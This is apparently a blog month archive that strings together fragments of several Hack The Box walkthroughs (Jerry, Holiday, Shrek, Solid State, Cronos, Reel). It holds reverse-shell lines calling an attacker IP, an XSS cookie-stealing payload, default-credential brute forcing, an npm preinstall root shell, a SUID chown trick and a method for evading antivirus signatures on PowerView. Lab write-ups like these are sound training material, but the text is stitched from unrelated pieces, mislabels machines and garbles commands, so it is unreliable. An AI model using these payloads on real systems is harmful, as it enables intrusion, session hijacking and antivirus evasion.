Maand: november 2018

Today we are going to solve another CTF challenge “Jerry” which is available online for those who want to increase their skill in penetration testing. Jerry is retried vulnerable lab presented by Hack the Box.

I then decided to access the Tomcat webpage at the URL: http://10.10.10.95:8080 From here, I decided to take to Google, to try and find documentation on the administration portal in Tomcat.

After Googling for some time, I learn that Tomcat does not call it’s Administrator’s admins, but instead calls them managers. I also realize that I can access the portal through the link:http://10.10.10.95:8080/manager/html
​

Is it worth trying to login with default or common credentials, and @danielmiessler’s SecLists contains a comprehensive list of Tomcat credentials.
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials /tomcat-betterdefaultpasslist.txt
As this list contains 79 credentials it is worth scripting some automation
The script “tomcat-brute.py”is used.

I soon begin to realize that all of the file formats are in *.war and that I can only upload *.war file types. So after doing some research, I realize that I can create payloads using metasploit! I create a *.war payload using the command:

​I then uploaded the file and clicked to start the service. After, I start a netcat session by using the command: # nc -nvlp 443
to start listening for any services that want to connect, So I can gain a reverse shell.
I then go back to the website and type into the URL:http://10.10.10.95:8080/shell/wxiucdkyhxeetnn.jsp
Please remember that the *.jsp file is the file name that was extracted earlier from the shell.war file.

Today we are going to solve another CTF challenge “Holiday” which is available online for those who want to increase their skill in penetration testing. Jerry is retried vulnerable lab presented by Hack the Box.

Level: Expert !!

Task: find user.txt and root.txt file on victim’s machine.

Let’s begin with nmap port enumeration.

nmap-A-p-10.10.10.25--open

From given below image, you can observe we found port 22 and 8000 are open on target system.

As port 8000 is running http we open the IP address in the browser, and find a webpage.

We didn’t find anything on the webpage so we use dirb to enumerate the directories.

1

dirb http://10.10.10.25:8000

Dirb scan gives us a link to a directory called /login, we open the link and find a login page.

We capture the login request using burpsuite. We use random credentials as placeholder.

We use sqlmap to check if it is vulnerable to sql injection. After finding that it is vulnerable to sql injection, we use sqlmap to dump the database and find a username “RickA” and password hash.

We use hashkiller.co.uk to decrypt the hash and find the password to the user. : nevergonnagiveyouup

We login using these credentials and we are redirected to a page with that looks like it contains user information.

We click on one of the UUID link and find a page that we can post notes for the users. It also shows that it will take up to 1 minute to post the note.

We try exploit the note function, and find it is vulnerable xss. As the notes are being read by administrator xss can be used to get the admin cookie. To run xss and run our payload we need to bypass the filter using java script function String.fromCharCode to run our payload. I created this script here to convert string to ascii code.

We post the note to bypass the filter we have to use this payload:

1

<img src=”x/><script>eval(String.CharCode(<payload>));</script>”>

We setup our listener using nc on port 80, as we will receive the the response of the page including the administrator cookie on this port.

1

nc–lvp80

After waiting for 1 minute we received the admin cookie.

The cookie is url encoded we decode and use it hijack the administrator session.

We capture the webpage’s request using burpsuite. We change our cookie with that of administrator and forward it.

As soon as we forward the request, we are able to successfully hijack the administrator session.

We now go to /admin directory and find a page where there are options to export bookings and notes.

We capture the request using burpsuite, and check if it is vulnerable to any king of injection. After enumerating we find that this page is vulnerable to command injection.

We are unable to get a shell using web_delivery module of metaploit due to there being filters. Now we create a payload using msfvenom to upload into the target machine using command injection and get reverse shell.

We run the shell using command injection vulnerability on the target machine.

As soon as we run the shell we get a reverse shell.

We spawn a tty shell and take a look at the sudoers list and find that we can run /usr/bin/npm I * as root with no password.

1

2

python–c“import pty; pty.spawn(‘/bin/bash’)”

sudo–l

Before trying to get root shell we first enumerate rest of the directories and find a file called “user.txt” in /home/algernon directory. We take a look at the content of the files and find the first flag.

Now we try to take root.txt we go to /app directory. We rename package.json to pack, and symlink /root/root.txt package.json

1

ln–s/root/root.txt package.json

We run /usr/bin/npm i * as root user and find the final flag.

After searching through google we find a way to get reverse shell using a package called rimrafall.

We setup rimrafall by following the instructions given on the webpage.

We setup the json file and change the preinstalled script to bash one liner.

We run the command as root user to get privileged shell.

1

sudo npmirimrafall—unsafe

We setup the listener as soon as we run the preinstalled shell is getting executed we get a reverse shell.

1

nc –nvlp1234

We go to /root directory and find a file called root.txt. We take a look at the content of the file and find the final flag.

Today we are going to solve another CTF challenge “Shrek” which is available online for those who want to increase their skill in penetration testing. Shrek is retried vulnerable lab presented by Hack the Box.

After setting the permissions of key to 600 we use this rsa key to log in . We use the username as sec as we found earlier and use the passphrase we found before to log in. As we log in we go to /home/sec directory, in that directory we find a file called user.txt. When we open the file we get our first flag.

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt The /usr/src​ folder is writeable for the sec ​user and contains a thoughts.txt​ file owned by root.
Attempting to create a file will reveal (after a bit of a delay) that there is a scheduled task which runs chown *​ in the directory. Using the above exploit, it is possible to force chown to use a reference file and apply the owner:group of that file to everything in the directory. The commandtouch — –reference=thoughts.txt ​will create a file, with the name being passed as an argument to chown when it runs.
After that is configured, it is possible to create a binary and set its SUID bit. After the task runs and chowns the binary, it is possible to execute code as root.

Now to exploit the file we create a c program in our system that can give us the root.txt file in root directory. After creating the file we use SimpleHTTPServer module of python to transfer the file.

Today we are going to solve another CTF challenge “Solid State” which is available online for those who want to increase their skill in penetration testing. Solid State is retried vulnerable lab presented by Hack the Box.

Cool, so we did find an E-Mail, and our target is likely a mail server. Maybe we’ll need this later, maybe not, might as well save it.

A quick poke on exploit-db and you’ll find this PDF, which shows how you can achieve remote code execution on Apache JAMES by overwriting /etc/bash_completion.d by creating the user ../../../../../../../../etc/bash_completion.d in JAMES Remote Adminand then sending an E-Mail to them with a nested command in the body which will be executed when a user logs in next. However, we should put this in the back of our mind for now and first check if the default login for JAMES Remote Admin has been changed.

So right off the bat we can see our path is /home/mindy/bin and we cannot write to this environmental variable to change our path. In addition commands including / will be ignored, so we cannot use the full path to a binary. Lastly we see we are locked into an rbash shell, which also, is not writable. This is where the exploit mentioned earlier comes into play, we now have a user to login with to trigger our exploit, so we just need to prep a bit.

.

Since we have enumerated the target network and found Apache James Serer 2.3.2 is running and after Browsing through the internet we stumbled across the Exploit DB module shown below, now copy the whole python code from here.

Paste above copied python code in a text file and make following changes inside payload as highlighted in below image and then save it, we have it as exploit.py on the desktop.

nc-e/bin/sh10.10.14.38000

Here 10.10.14.3 is attacker’s IP and 8000 is listening port for reverse connection from targets network.

Ok Done! The Exploit will work only when someone logs in. So let’s again login into SSH shell using the user Mindy’s Credentials and as soon as we login the exploit begin to work as shown below.

Let’s open a netcat Listener to get the shell which will be generated after our exploit gets completely executed. Now we need to import the python file to reach the terminal and to do so type:

python -c "import pty; pty.spawn('/bin/bash')"

Lovely!! So again we got access of victim’s system shell but this time we had access TTys shell of his system,

Now let move towards 2nd challenge for root.txt and currently we are in Mindy directory. For root.txt file we need to move into root but I have no idea for further step. Then I recall Mindy has received a mail from admin account send by James, there are chance of getting any hint from James therefore I prefer to grep running process of James by executing following command.

ps aux|grep james

Here aux will work as describe below:

a = display processes for all usersu = show the process’s user/ownerx = show processes not attached to a terminal

Great!! It has shown root process for opt file.

Then I move into /opt directory and run ls-al command for exploring all files and folder inside this directory.

Lastly, we setup a listener, when the user mindy logs into ssh it will execute the reverse shell. Below you can see the output from SSH as it loses all its shit.

➜ ~ ssh mindy@10.10.10.51
mindy@10.10.10.51's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan 26 23:20:16 2018 from 10.10.15.82
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
--trimmed due to size---

Note: if another user beat you to this exploit you can actually bypass rbash all together by pressing CTRL+C a few times, making this whole process way quicker.

Moving on let’s see what we can figure out about the system. By greppingps for Jameswe find it’s running a bash script and jvm from the /opt directory. These are things we should investigate, however, poking around at them I wasn’t able to find anything interesting.

Today we are going to solve another CTF challenge “Cronos” which is available online for those who want to increase their skill in penetration testing. Cronos is retried vulnerable lab presented by Hack the Box.

The last scheduled activity executes a process called artisan locate in /var/www/laravel
When we check the file’s permissions:

100755/rwxr-xr-x 1646 fil 2017-04-09 05:30:09 +0530 artisan

So we can replace this file with our payload.
Create a new payload and upload it here.
Rename it to artisan
Make it executable by chmod +x artisan
Put this 2nd netcat listener to background and listen for the new connection

Today we are going to solve another CTF challenge “Reel” which is available online for those who want to increase their skill in penetration testing. Reel is retried vulnerable lab presented by Hack the Box.Level: IntermediateTask: find user.txt and root.txt file on victim’s machine.Let’s begin with nmap port enumeration.

Thats quite an interesting attack surface we have right here! There”s no web service listening on this box, so right away we see this isn”t going to be the typical webapp-exploit-then-root machine, which is cool!

Whenever I see FTPs, the first thing I always try is anonymous login, so lets go for that.

Hmmm. Converting RTFs to what? DOCX maybe? Since the other documents in the directory are Microsoft Word documents, that seems a reasonable guess to make. Now, I am unable to read Windows Event Forwarding.docx, my LibreOffice spits out an error everytime I try, but I have more luck with AppLocker.docx. It says:

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

Ok, bad news. This probably means we will have to face AppLocker once we get a shell on the box. But we are far from that! So, now what?

The wonders of metadata

We have a good amount of information from our enumeration phase. Now it is time to craft a meticulously planned several-stage attack or to bang our heads against the machine until something works. Yay, hacking!

We know from our nmap scan that the server has an SMTP service listening at port 25, which kind of sticks out now because of the readme.txt we previously read. So maybe we are capable of using this SMTP server to send e-mails, but to whom?

Well, whoever wrote/converted the documents in the FTP server, she is probably a user of the machine and therefore a potential victim. So is there a chance her user account is somewhere in the generated documents?

Now, I have a confession to make. I dont usually add it to my writeups unless it gives some useful information, but I use exiftool on almost EVERYTHING I find during reconaissance when solving CTFs or doing pentest. Itís probably some kind of derangement that affected me after my first three or four CTF-like machines involved searching for metadata in images or documents.

So you can imagine I got really happy when I ran exiftool on the three documents and one of them was bingo:

We finally have a shell on this box. It’s going to be easy from here, right? Of course, that malicious document thing is the peak of difficulty of this machine, is it not? (Narrator: again, it was not)

Normally, my first serious move when landing on a Windows machine is running PowerUp.ps1, analyze the results and work from there. But, before that, I like to peek around, at least the home directory of the user I have accessed with. So, to C:\Users\nico\ we go!

In his Desktop, aside from the user.txt flag (yay!), thereis an interesting file called cred.xml:

Hey, I know the type PSCredential! As the name of the file suggests, it probably contains credentials, and judging by its contents, they belong to the user tom. Thats great! Its only a matter of researching what type of file is this and how to obtain the plain-text password from it. After googling a little, two StackOverflow answers help me understand that this file is the XML representation of a serialized Powershell object, more specifically a PSCredential one. And that the Powershell command Import-Clixml can help us undoing the process:

BloodHound is a tool that allows to make graphs of relationship between the different objects of an ActiveDirectory (users, groups, machines, etc) and thus to highlight the presence of problems of permission making it possible to trace up privileges of domain administrator. An explanatory video can be seen on YouTube .

Bloodhound has a graphic part. The other part is used to generate the CSVs from which the graphs will be generated:

We can call more finely the module or launch more exhaustive. In any case, it generates CSV files in the current directory that is hastily repatriated to load in BloodHound that we have previously installed and configured .

BloodHound has a path search feature that here does not return anything from Tom to the Domain Admins group . But if we are interested in the rights we currently have it becomes interesting:

Here we have the right writeOwner that defines who is the owner of the user Claire.
It’s also possible to find this relationship directly with PowerView:

A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut down.

We can then grant the privileges of adding a member and add us to the group:

No errors, seems good! We can check it worked by running net user claire and seeing we are indeed a proud member of BACKUP_ADMINS. Great! Now what?

Note

At this point, while I was exploring Claire as a BACKUP_ADMINS member, other Hack The Box users were constantly resetting Claire’s password to other values, so if I logged out (you will see why in a moment) I couldn’t log back in. I ended up leaving Toms SSH session open and prepared a script to automate the process of resetting Claire’s password to the value I wanted so, if someone changed it, I could easily change it back. My ResetClairePassword.ps1 script was like this:

Backup Admin

Another shameful confession. I wasted a lot of time at this point, and it was pretty frustrating. It required a lot of work reaching to this point, and it seemed it was for nothing. I couldn’t access Administrator home directory, I couldn’t read or write new files compared to base Claire, BACKUP_ADMINS didn’t have any control over other AD objects according to BloodHound So, was all this work for nothing?!

Turns out you have to log out and log in again for group changes to take effect. Its something obvious, its something I knew from Linux (it works the same way there), but my tired brain couldn’t remember it and that meant a lot of frustration and wasted time wandering around. Lesson learned (even though I thought I already knew this): if you are tired, take a break! Even if you feel the victory so near you could touch it, working with a tired mind almost always doesn’t pay off.

Ok, after this dramatic complication, we can continue! Log out, log in again, and the group change takes effect. Now, as Claire, we can access C:\Users\Administrator. Finally!! Lets read root.txt and claim our well deserved prize:

Alright, its just digging work at this point. After reviewing these scripts one by one (which seem to be used to automate the backup process of some directories of the box), we finally find what we are looking for:

SEP immediately picked up on this and prevented the downloading of the script with an exception when calling “DownloadString”. Based on this it is safe to assume that it is getting caught when downloading the script, not while executing. I took a step further and assumed there was some basic text, most likely in comments, that was used to identify the Powerview script in the attack signature.

Workaround

I used the follow Sed command to pull out the comment and create a new comment-free Powerview.ps1 file:

sed '/<#/,/#>/d' powerview.ps1 > new_powerview.ps1

This will leave in single line comments, but it turns out that is not where the signature is located. After doing this, SEP was perfectly happy letting me download and execute Powerview cmdlets. Out of curiosity, I decided to drill down and identify the exact signature. Here it is: